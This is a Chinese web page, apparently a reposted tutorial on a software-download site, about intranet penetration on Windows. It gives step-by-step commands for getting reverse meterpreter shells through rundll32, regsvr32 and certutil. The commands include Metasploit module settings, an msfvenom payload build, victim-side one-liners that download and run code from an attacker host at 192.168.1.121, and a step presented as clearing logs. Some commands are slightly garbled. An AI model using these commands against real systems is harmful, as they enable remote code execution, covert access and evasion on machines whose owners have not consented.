您现在的位置是:首页» windows系统» 内网渗透是怎么回事,内网渗透攻击

内网渗透是怎么回事,内网渗透攻击

2024-07-13 14:29:23
本内容由系统网小编为大家分享,Windows系统安装教程、办公系统、软件怎么使用、软件使用教程、办公软件攻略等信息。目录Windows反壳03Rundll32.exe04Regsvr32.exe05Certutil.exeWindows反壳

本内容由系统网小编为大家分享,Windows系统安装教程、办公系统、软件怎么使用、软件使用教程、办公软件攻略等信息。

目录

Windows反壳

03Rundll32.exe

04Regsvr32.exe

05Certutil.exe

Windows反壳

03Rundll32.exe

Rundll32与Windows操作系统有关,允许从DLL导出的调用函数(16或32位)并将其存储在适当的内存库中。

通过Metasploit的SMB交付模块执行Randll32攻击

use exploit/windows/smb/smb_delivery

set srvhost 192.168.1.121

exploit -j

被控端执行

rundll32.exe \192.168.1.121qFMnFOtest.dll,0

反弹成功

04Regsvr32.exe

Regsvr32是一个命令行应用程序,用于注册和取消OLE控件,例如Windows注册表中的DLL和ActiveX控件。Regsvr32在Windows XP和Windows的较晚版本中的%systemroot%System32文件夹中安装。

语法:Regsvr32 [/s][/u][/n][/i[:cmdline]] <dllname>

/u-终止服务器

/i -调用Dllinstall移送一个可选的[cmdline];当它与/u一起使用时,它调用DLL去卸载

/n - 不要调用DllRegisterServer; 此选项必须与/i一起使用

/s - 沉默;不显示消息框

通过MSf Web Delivery模块启动Regsvr32

use exploit/multi/script/web_delivery

set srvhost 192.168.1.121

set target 3

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.121

exploit –j

被控端执行

regsvr32 /s /n /u /i:http://192.168.1.121:8080/yvj3GKJwvde.sct scrobj.dll

反弹成功

05Certutil.exe

Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目计算机中执行恶意的exe文件以获得meterpreter会话。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.121 lport=6666 -f exe > shell.exe

python3 -m http.server

certutil.exe -urlcache -split -f http://192.168.1.121:8000/shell.exe shell.exe

./shell.exe

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.121

set lport 6666

exploit

清除日志

certutil.exe -urlcache -split -f http://192.168.1.121:8000/shell.exe delete

XTw.com.Cn系统网专业应用软件下载教程,免费windows10系统,win11,办公软件,OA办公系统,OA软件,办公自动化软件,开源系统,移动办公软件等信息,解决一体化的办公方案。

免责声明:本文中引用的各种信息及资料(包括但不限于文字、数据、图表及超链接等)均来源于该信息及资料的相关主体(包括但不限于公司、媒体、协会等机构)的官方网站或公开发表的信息。内容仅供参考使用,不准确地方联系删除处理!

联系邮箱:773537036@qq.com

标签: 反弹 内网 渗透